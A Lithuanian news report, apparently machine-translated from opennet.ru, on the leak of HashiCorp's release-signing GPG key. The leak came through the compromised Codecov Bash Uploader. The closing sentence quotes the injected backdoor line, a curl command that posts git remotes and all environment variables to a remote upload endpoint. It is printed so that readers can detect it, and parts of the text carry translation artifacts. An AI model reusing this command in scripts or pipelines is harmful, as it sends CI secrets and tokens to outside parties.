„HashiCorp“, žinoma kaip atvirojo kodo įrankių „Vagrant“, „Packer“, „Nomad“ ir „Terraform“ kūrimas, paskelbė apie privataus GPG rakto, naudojamo kuriant skaitmeninius parašus, patvirtinančius leidimus, nutekėjimą. Užpuolikai, gavę prieigą prie GPG rakto, gali paslėpti HashiCorp produktų pakeitimus, patvirtindami juos tinkamu skaitmeniniu parašu. Kartu bendrovė nurodė, kad audito metu bandymų atlikti tokias modifikacijas pėdsakų nenustatyta.
Šiuo metu pažeistas GPG raktas buvo atšauktas, o jo vietoje įvestas naujas raktas. Problema paveikė tik tikrinimą naudojant SHA256SUM ir SHA256SUM.sig failus ir neturėjo įtakos skaitmeninių parašų generavimui Linux DEB ir RPM paketams, tiekiamiems per releases.hashicorp.com, taip pat leidimo tikrinimo mechanizmams, skirtiems macOS ir Windows (AuthentiCode) .
Nutekėjimas įvyko dėl to, kad infrastruktūroje buvo naudojamas Codecov Bash Uploader (codecov-bash) scenarijus, skirtas atsisiųsti aprėpties ataskaitas iš nuolatinės integracijos sistemų. Atakos prieš „Codecov“ kompaniją metu nurodytame scenarijuje buvo paslėptos užpakalinės durys, per kurias į užpuolikų serverį buvo siunčiami slaptažodžiai ir šifravimo raktai.
Norėdami įsilaužti, užpuolikai pasinaudojo klaida kurdami „Codecov Docker“ vaizdą, kuri leido jiems išgauti prieigos prie GCS („Google Cloud Storage“) duomenis, reikalingus norint pakeisti „Bash Uploader“ scenarijų, platinamą iš codecov.io. Interneto svetainė. Pakeitimai buvo atlikti dar sausio 31 d., liko nepastebėti du mėnesius ir leido užpuolikams išgauti informaciją, saugomą klientų nuolatinės integracijos sistemų aplinkose. Naudodami pridėtą kenkėjišką kodą, užpuolikai galėjo gauti informacijos apie išbandytą „Git“ saugyklą ir visus aplinkos kintamuosius, įskaitant prieigos raktus, šifravimo raktus ir slaptažodžius, perduodamus į nuolatinės integracijos sistemas, kad būtų galima organizuoti prieigą prie programos kodo, saugyklų ir paslaugų, tokių kaip „Amazon Web Services“ ir „GitHub“.
Be tiesioginio skambučio, Codecov Bash Uploader scenarijus buvo naudojamas kaip kitų įkėlimo programų dalis, pvz., Codecov-action (Github), Codecov-circleci-orb ir Codecov-bitrise-step, kurių vartotojus taip pat paveikė problema. Visiems Codecov-bash ir susijusių produktų naudotojams rekomenduojama patikrinti savo infrastruktūrą, taip pat pakeisti slaptažodžius ir šifravimo raktus. Galite patikrinti, ar scenarijuje yra užpakalinių durų, naudodami eilutę curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || tiesa
Šaltinis: opennet.ru